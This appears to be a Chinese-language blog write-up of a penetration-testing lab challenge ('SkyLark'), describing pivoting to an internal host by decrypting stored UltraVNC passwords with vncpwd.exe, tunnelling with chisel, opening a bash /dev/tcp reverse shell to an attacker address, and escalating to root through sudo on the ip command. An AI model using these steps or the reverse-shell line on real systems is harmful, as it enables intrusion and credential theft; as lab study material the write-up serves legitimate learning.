Challenge 3 - SkyLark(8)

 Challenge 3 - SkyLark(8)

下一台選定內網的 .10



透過外網 .220 開啟 RDP 後,安裝 Port Scan UI 軟體掃掃看

10.10.184.10 有開兩個 Port 22 & 5901



chisel mapping 22 Port 到 2222 Port 後使用現有的帳號密碼爆破

結果沒有任何發現




最後在 .220 的 C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini 檔案發現兩組密碼

passwd=BFE825DE515A335BE3

passwd2=59A04800B111ADB060




查看相關 VNC 說明,發現在檔案中的密碼是經過金鑰加密的
可以看到跟這一台一樣的 UltraVNC 密碼存放檔就是 ultravnc.ini 檔案
預設的金鑰是 passwd 或 passwd2





因為密碼在檔案中是經過加密的

參考 https://whatsoftware.com/crack-or-decrypt-vnc-server-encrypted-password/

下載 vncpwd.exe,參考 https://whatsoftware.com/download/did/232/

直接載入到 .220 上去執行 

.\vncpwd.exe BFE825DE515A335BE3 & .\vncpwd.exe 59A04800B111ADB060

獲得密碼 R3S3+rcH & ABCDEFGH




將 10.10.172.10 5901 Port mapping 到 kali 5901 Port

然後直接 └─$ vncviewer 127.0.0.1::5901 輸入密碼 R3S3+rcH 就進去 10 了



先拿取 local.txt,看來這個帳號沒有 root 權限,還要 PE



VNC 太難用了,使用 bash -c "bash -i >& /dev/tcp/192.168.45.221/4444 0>&1" 與 chisel

搭建一個 Reverse Shell 回到 kali

這一台有兩隻腳,發現了 LAB 中的 10.20.172.0/24 網段

看來要進入 10.20.xxx.0/24 是透過這一台進去,先放著晚點再來看



cat /etc/passwd

帳號 research、development



sudo -l



參考 GTFO ip 指令



照著做就 root 了,順便拿 flag



更新攻擊列表




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(1)